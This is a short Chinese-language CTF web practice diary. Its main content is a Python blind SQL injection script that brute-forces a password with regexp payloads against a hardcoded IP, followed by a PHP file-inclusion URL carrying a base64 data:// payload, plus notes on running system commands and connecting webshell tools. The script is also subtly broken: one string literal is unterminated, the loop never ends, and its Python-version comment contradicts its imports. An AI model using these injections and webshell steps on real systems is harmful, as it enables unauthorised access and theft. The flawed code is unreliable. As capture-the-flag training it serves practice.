CTF_web篇_练手日记

# -*- coding: utf-8 -*-
import requests,time
from urllib.parse import quote
# py 2.7
url = "http://47.102.127.194:8801/check.php"
character =[1,2,3,4,5,6,7,8,9,0,'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p'
,'q','r','s','t','u','v','w','x','y','z']
password = ""
key=1
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE',
    'Content-Type': 'application/x-www-form-urlencoded'
}
while(key):
    password_found = False
    for c in character:
        username='\'
        passwd='||passwd/**/regexp/**/"^%s";%%00'
        _ = password + str(c)
        params = {'username': username, 'passwd':passwd %_ }
        send_query = requests.post(url,data=params,headers=headers)

        if "Welcome to CTF Training" in send_query.text:
            password = password + str(c)
            password_found = True
            break
print(password,'||start:',str(c))

ctf篇：PHP_include
http://124.126.19.106:52267/?page=data://text/plain/;base64,PD9waHAgc2hvd19zb3VyY2UoImZsNGdpc2lzaXNoM3IzLnBocCIpOyA/Pg==

第一步使用 system("ls");查看
发现使用system("cat **.php") 读取不了
发现使用菜刀或者蚁剑连接都可
或者使用show_source("**.php") 直接相看flag
2020-04-30